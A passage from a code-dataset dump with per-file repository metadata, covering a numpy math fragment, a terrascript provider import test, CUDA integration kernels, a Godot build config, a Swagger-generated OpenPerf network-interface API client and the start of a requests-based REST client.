- 10 * a_conj ** 2 * (1 + 5 * b + b ** 2)
+ 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
- 4
* a
* a_conj
* (
2
+ 13 * b
- 7 * b ** 2
- 3 * b ** 3
+ 5 * a_conj ** 2 * (1 + b)
)
+ 4
* a ** 3
* (-5 * a_conj * (1 + b) + a_conj ** 3 * (-2 + 3 * b))
- 2
* a ** 2
* (
5 * a_conj ** 4
+ 5 * (1 + 5 * b + b ** 2)
- a_conj ** 2 * (-11 + b + 9 * b ** 2)
)
)
* np.log(
a * a_conj
- b
+ (a * a_conj + b) ** 2
- x ** 2
- a * a_conj * x ** 2
+ b * x ** 2
+ np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
* np.sqrt(
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
)
)
)
return 4 * np.pi * c * ret
if abs(a_conj) < 0.00000001:
return 0
| 40.294661 | 113 | 0.156477 | 19,779 | 218,115 | 1.617473 | 0.023055 | 0.230683 | 0.093586 | 0.041792 | 0.842023 | 0.795386 | 0.736184 | 0.675419 | 0.645505 | 0.610434 | 0 | 0.187542 | 0.714637 | 218,115 | 5,412 | 114 | 40.302106 | 0.326452 | 0.019756 | 0 | 0.642029 | 0 | 0 | 0.000211 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004914 | false | 0 | 0.000786 | 0 | 0.015923 | 0 | 0 | 0 | 1 | null | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
96237664eec4f60579142872bf232052d8e14ac1 | 1,095 | py | Python | tests/test_provider_davidji99_ultradns.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | tests/test_provider_davidji99_ultradns.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | tests/test_provider_davidji99_ultradns.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # tests/test_provider_davidji99_ultradns.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:29:41 UTC)
def test_provider_import():
import terrascript.provider.davidji99.ultradns
def test_resource_import():
from terrascript.resource.davidji99.ultradns import ultradns_dirpool
from terrascript.resource.davidji99.ultradns import ultradns_probe_http
from terrascript.resource.davidji99.ultradns import ultradns_probe_ping
from terrascript.resource.davidji99.ultradns import ultradns_rdpool
from terrascript.resource.davidji99.ultradns import ultradns_record
from terrascript.resource.davidji99.ultradns import ultradns_tcpool
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.davidji99.ultradns
#
# t = terrascript.provider.davidji99.ultradns.ultradns()
# s = str(t)
#
# assert 'https://github.com/davidji99/terraform-provider-ultradns' in s
# assert '2.1.0' in s
| 31.285714 | 80 | 0.782648 | 137 | 1,095 | 6.124088 | 0.459854 | 0.202622 | 0.164482 | 0.228844 | 0.498212 | 0.398093 | 0.398093 | 0.140644 | 0 | 0 | 0 | 0.03932 | 0.140639 | 1,095 | 34 | 81 | 32.205882 | 0.852285 | 0.463927 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029412 | 0 | 1 | 0.222222 | true | 0 | 1 | 0 | 1.222222 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
8250fe4d2e930d70c12a28744b7af49e0901d971 | 139 | py | Python | src/easy_keymap/__init__.py | Thom1729/SublimeConfig | d9dd6b611f6a5ae604e89edd6b809928affc81d7 | [
"MIT"
] | null | null | null | src/easy_keymap/__init__.py | Thom1729/SublimeConfig | d9dd6b611f6a5ae604e89edd6b809928affc81d7 | [
"MIT"
] | null | null | null | src/easy_keymap/__init__.py | Thom1729/SublimeConfig | d9dd6b611f6a5ae604e89edd6b809928affc81d7 | [
"MIT"
] | null | null | null | from .easy_keymap import CompileKeymapCommand
from .easy_keymap import CreateEasyKeymapCommand
from .easy_keymap import SaveKeymapListener
| 34.75 | 48 | 0.892086 | 15 | 139 | 8.066667 | 0.466667 | 0.198347 | 0.347107 | 0.495868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086331 | 139 | 3 | 49 | 46.333333 | 0.952756 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
82540d6b3a19c79e272d3e6b51eb4c7278a60967 | 3,865 | py | Python | smuthi/linearsystem/particlecoupling/prepare_lookup_cuda.py | parkerwray/smuthi-1 | a5ced07461b8fd223dc37d28259261ceed78aed5 | [
"MIT"
] | null | null | null | smuthi/linearsystem/particlecoupling/prepare_lookup_cuda.py | parkerwray/smuthi-1 | a5ced07461b8fd223dc37d28259261ceed78aed5 | [
"MIT"
] | null | null | null | smuthi/linearsystem/particlecoupling/prepare_lookup_cuda.py | parkerwray/smuthi-1 | a5ced07461b8fd223dc37d28259261ceed78aed5 | [
"MIT"
] | null | null | null | """This module contains CUDA source code for the preparation of coupling
matrix lookups."""
# This cuda kernel is used for the calculation of volume lookup tables.
volume_lookup_assembly_code = """
#define BLOCKSIZE %i
#define RHO_ARRAY_LENGTH %i
#define Z_ARRAY_LENGTH %i
#define K_ARRAY_LENGTH %i
__global__ void helper(const float *re_bes_jac, const float *im_bes_jac, const float *re_belbee,
const float *im_belbee, const float *re_d_kappa, const float *im_d_kappa,
float *re_result, float *im_result)
{
unsigned int i = blockIdx.x * blockDim.x + threadIdx.x;
if(i >= RHO_ARRAY_LENGTH * Z_ARRAY_LENGTH) return;
unsigned int i_rho = i / Z_ARRAY_LENGTH;
unsigned int i_z = i %% Z_ARRAY_LENGTH;
float re_res = 0.0;
float im_res = 0.0;
int i_kr = i_rho * K_ARRAY_LENGTH;
int i_kz = i_z * K_ARRAY_LENGTH;
float re_integrand_kp1 = re_bes_jac[i_kr] * re_belbee[i_kz] - im_bes_jac[i_kr] * im_belbee[i_kz];
float im_integrand_kp1 = re_bes_jac[i_kr] * im_belbee[i_kz] + im_bes_jac[i_kr] * re_belbee[i_kz];
for (int i_k=0; i_k<(K_ARRAY_LENGTH-1); i_k++)
{
i_kr = i_rho * K_ARRAY_LENGTH + i_k;
i_kz = i_z * K_ARRAY_LENGTH + i_k;
float re_integrand = re_integrand_kp1;
float im_integrand = im_integrand_kp1;
re_integrand_kp1 = re_bes_jac[i_kr+1] * re_belbee[i_kz+1] - im_bes_jac[i_kr+1] * im_belbee[i_kz+1];
im_integrand_kp1 = re_bes_jac[i_kr+1] * im_belbee[i_kz+1] + im_bes_jac[i_kr+1] * re_belbee[i_kz+1];
float re_sint = re_integrand + re_integrand_kp1;
float im_sint = im_integrand + im_integrand_kp1;
re_res += 0.5 * (re_sint * re_d_kappa[i_k] - im_sint * im_d_kappa[i_k]);
im_res += 0.5 * (re_sint * im_d_kappa[i_k] + im_sint * re_d_kappa[i_k]);
}
re_result[i] = re_res;
im_result[i] = im_res;
}"""
# This cuda kernel is used for the calculation of radial lookup tables.
radial_lookup_assembly_code = """
#define BLOCKSIZE %i
#define RHO_ARRAY_LENGTH %i
#define K_ARRAY_LENGTH %i
__global__ void helper(const float *re_bes_jac, const float *im_bes_jac, const float *re_belbee,
const float *im_belbee, const float *re_d_kappa, const float *im_d_kappa,
float *re_result, float *im_result)
{
unsigned int i = blockIdx.x * blockDim.x + threadIdx.x;
if(i >= RHO_ARRAY_LENGTH) return;
float re_res = 0.0;
float im_res = 0.0;
int i_kr = i * K_ARRAY_LENGTH;
float re_integrand_kp1 = re_bes_jac[i_kr] * re_belbee[0] - im_bes_jac[i_kr] * im_belbee[0];
float im_integrand_kp1 = re_bes_jac[i_kr] * im_belbee[0] + im_bes_jac[i_kr] * re_belbee[0];
for (int i_k=0; i_k<(K_ARRAY_LENGTH-1); i_k++)
{
i_kr = i * K_ARRAY_LENGTH + i_k;
float re_integrand = re_integrand_kp1;
float im_integrand = im_integrand_kp1;
re_integrand_kp1 = re_bes_jac[i_kr+1] * re_belbee[i_k+1] - im_bes_jac[i_kr+1] * im_belbee[i_k+1];
im_integrand_kp1 = re_bes_jac[i_kr+1] * im_belbee[i_k+1] + im_bes_jac[i_kr+1] * re_belbee[i_k+1];
float re_sint = re_integrand + re_integrand_kp1;
float im_sint = im_integrand + im_integrand_kp1;
re_res += 0.5 * (re_sint * re_d_kappa[i_k] - im_sint * im_d_kappa[i_k]);
im_res += 0.5 * (re_sint * im_d_kappa[i_k] + im_sint * re_d_kappa[i_k]);
}
re_result[i] = re_res;
im_result[i] = im_res;
}""" | 40.684211 | 111 | 0.59586 | 626 | 3,865 | 3.258786 | 0.095847 | 0.022549 | 0.054902 | 0.070588 | 0.90098 | 0.9 | 0.9 | 0.859804 | 0.835294 | 0.797059 | 0 | 0.020872 | 0.305821 | 3,865 | 95 | 112 | 40.684211 | 0.739471 | 0.058732 | 0 | 0.584615 | 0 | 0.123077 | 0.977974 | 0.012665 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
825ed836fb87c2a78f2009fd4745bac7f8204845 | 152 | py | Python | config.py | organicpencil/gdnet3 | b4b951e0cffc0c594ea58de52d3b1eee2222f325 | [
"MIT"
] | null | null | null | config.py | organicpencil/gdnet3 | b4b951e0cffc0c594ea58de52d3b1eee2222f325 | [
"MIT"
] | null | null | null | config.py | organicpencil/gdnet3 | b4b951e0cffc0c594ea58de52d3b1eee2222f325 | [
"MIT"
] | null | null | null | def can_build(platform):
return (platform == "x11" or platform == "server" or platform == "windows" or platform == "osx")
def configure(env):
pass
| 25.333333 | 99 | 0.671053 | 20 | 152 | 5.05 | 0.65 | 0.29703 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015873 | 0.171053 | 152 | 5 | 100 | 30.4 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0.25 | 0 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 7 |
7d621017a37d03057af3375d6d86d17e1f080de8 | 24,821 | py | Python | tests/aat/api/v1/client/api/interfaces_api.py | DerangedMonkeyNinja/openperf | cde4dc6bf3687f0663c11e9e856e26a0dc2b1d16 | [
"Apache-2.0"
] | 20 | 2019-12-04T01:28:52.000Z | 2022-03-17T14:09:34.000Z | tests/aat/api/v1/client/api/interfaces_api.py | DerangedMonkeyNinja/openperf | cde4dc6bf3687f0663c11e9e856e26a0dc2b1d16 | [
"Apache-2.0"
] | 115 | 2020-02-04T21:29:54.000Z | 2022-02-17T13:33:51.000Z | tests/aat/api/v1/client/api/interfaces_api.py | DerangedMonkeyNinja/openperf | cde4dc6bf3687f0663c11e9e856e26a0dc2b1d16 | [
"Apache-2.0"
] | 16 | 2019-12-03T16:41:18.000Z | 2021-11-06T04:44:11.000Z | # coding: utf-8
"""
OpenPerf API
REST API interface for OpenPerf # noqa: E501
OpenAPI spec version: 1
Contact: support@spirent.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from client.api_client import ApiClient
class InterfacesApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def bulk_create_interfaces(self, create, **kwargs): # noqa: E501
"""Bulk create network interfaces # noqa: E501
Create multiple network interfaces. Requests are processed in an all-or-nothing manner, i.e. a single network interface creation failure causes all network interface creations for this request to fail. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_create_interfaces(create, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkCreateInterfacesRequest create: Bulk creation (required)
:return: BulkCreateInterfacesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.bulk_create_interfaces_with_http_info(create, **kwargs) # noqa: E501
else:
(data) = self.bulk_create_interfaces_with_http_info(create, **kwargs) # noqa: E501
return data
def bulk_create_interfaces_with_http_info(self, create, **kwargs): # noqa: E501
"""Bulk create network interfaces # noqa: E501
Create multiple network interfaces. Requests are processed in an all-or-nothing manner, i.e. a single network interface creation failure causes all network interface creations for this request to fail. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_create_interfaces_with_http_info(create, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkCreateInterfacesRequest create: Bulk creation (required)
:return: BulkCreateInterfacesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method bulk_create_interfaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create' is set
if ('create' not in params or
params['create'] is None):
raise ValueError("Missing the required parameter `create` when calling `bulk_create_interfaces`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create' in params:
body_params = params['create']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/interfaces/x/bulk-create', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BulkCreateInterfacesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def bulk_delete_interfaces(self, delete, **kwargs): # noqa: E501
"""Bulk delete network interfaces # noqa: E501
Best-effort delete multiple network interfaces. Non-existent interface ids do not cause errors. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_delete_interfaces(delete, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkDeleteInterfacesRequest delete: Bulk delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.bulk_delete_interfaces_with_http_info(delete, **kwargs) # noqa: E501
else:
(data) = self.bulk_delete_interfaces_with_http_info(delete, **kwargs) # noqa: E501
return data
def bulk_delete_interfaces_with_http_info(self, delete, **kwargs): # noqa: E501
"""Bulk delete network interfaces # noqa: E501
Best-effort delete multiple network interfaces. Non-existent interface ids do not cause errors. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_delete_interfaces_with_http_info(delete, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkDeleteInterfacesRequest delete: Bulk delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method bulk_delete_interfaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete' is set
if ('delete' not in params or
params['delete'] is None):
raise ValueError("Missing the required parameter `delete` when calling `bulk_delete_interfaces`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete' in params:
body_params = params['delete']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/interfaces/x/bulk-delete', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_interface(self, interface, **kwargs): # noqa: E501
"""Create a network interface # noqa: E501
Create a new network interface. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_interface(interface, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Interface interface: New network interface (required)
:return: Interface
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_interface_with_http_info(interface, **kwargs) # noqa: E501
else:
(data) = self.create_interface_with_http_info(interface, **kwargs) # noqa: E501
return data
def create_interface_with_http_info(self, interface, **kwargs): # noqa: E501
"""Create a network interface # noqa: E501
Create a new network interface. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_interface_with_http_info(interface, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Interface interface: New network interface (required)
:return: Interface
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['interface'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_interface" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'interface' is set
if ('interface' not in params or
params['interface'] is None):
raise ValueError("Missing the required parameter `interface` when calling `create_interface`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'interface' in params:
body_params = params['interface']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/interfaces', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Interface', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_interface(self, id, **kwargs): # noqa: E501
"""Delete a network interface # noqa: E501
Deletes an existing interface. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_interface(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_interface_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_interface_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_interface_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a network interface # noqa: E501
Deletes an existing interface. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_interface_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_interface" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_interface`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/interfaces/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_interface(self, id, **kwargs): # noqa: E501
"""Get a network interface # noqa: E501
Returns a network interface, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_interface(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: Interface
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_interface_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_interface_with_http_info(id, **kwargs) # noqa: E501
return data
def get_interface_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a network interface # noqa: E501
Returns a network interface, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_interface_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: Interface
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_interface" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_interface`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/interfaces/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Interface', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_interfaces(self, **kwargs): # noqa: E501
"""List network interfaces # noqa: E501
The `interfaces` endpoint returns all network interfaces that are available for use as stack entry/exit points. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_interfaces(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str port_id: Filter by port id
:param str eth_mac_address: Filter by Ethernet MAC address
:param str ipv4_address: Filter by IPv4 address
:param str ipv6_address: Filter by IPv6 address
:return: list[Interface]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_interfaces_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_interfaces_with_http_info(**kwargs) # noqa: E501
return data
def list_interfaces_with_http_info(self, **kwargs): # noqa: E501
"""List network interfaces # noqa: E501
The `interfaces` endpoint returns all network interfaces that are available for use as stack entry/exit points. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_interfaces_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str port_id: Filter by port id
:param str eth_mac_address: Filter by Ethernet MAC address
:param str ipv4_address: Filter by IPv4 address
:param str ipv6_address: Filter by IPv6 address
:return: list[Interface]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['port_id', 'eth_mac_address', 'ipv4_address', 'ipv6_address'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_interfaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'port_id' in params:
query_params.append(('port_id', params['port_id'])) # noqa: E501
if 'eth_mac_address' in params:
query_params.append(('eth_mac_address', params['eth_mac_address'])) # noqa: E501
if 'ipv4_address' in params:
query_params.append(('ipv4_address', params['ipv4_address'])) # noqa: E501
if 'ipv6_address' in params:
query_params.append(('ipv6_address', params['ipv6_address'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/interfaces', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Interface]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 38.965463 | 224 | 0.612304 | 2,816 | 24,821 | 5.165838 | 0.070668 | 0.052794 | 0.023098 | 0.029697 | 0.928714 | 0.91304 | 0.89503 | 0.8841 | 0.871451 | 0.86279 | 0 | 0.017876 | 0.299061 | 24,821 | 636 | 225 | 39.02673 | 0.818255 | 0.350228 | 0 | 0.755952 | 1 | 0 | 0.174139 | 0.038217 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03869 | false | 0 | 0.011905 | 0 | 0.107143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7d65c282262709519f880844bec41c754320a076 | 1,700 | py | Python | framework/services/rest_client.py | majdukovic/pybooker | b9a373d556be0481c93a528f731407ca7a47b11f | [
"MIT"
] | null | null | null | framework/services/rest_client.py | majdukovic/pybooker | b9a373d556be0481c93a528f731407ca7a47b11f | [
"MIT"
] | null | null | null | framework/services/rest_client.py | majdukovic/pybooker | b9a373d556be0481c93a528f731407ca7a47b11f | [
"MIT"
] | null | null | null | """
Created on Oct 13, 2019
@author: majdukovic
"""
import requests
class RestClient:
    """Thin wrapper around :mod:`requests` for generic REST calls.

    Every verb method shares the same parameter convention:

    :param url: target URL.
    :param data: request body (POST/PUT/UPDATE only).
    :param params: query-string parameters.
    :param hdrs: HTTP headers dict.
    :param ck: cookies dict.
    :param basic_auth: ``(user, password)`` tuple for HTTP basic auth.
    :param timeout: per-request timeout in seconds; when ``None`` the
        class-level ``default_timeout`` is used instead.
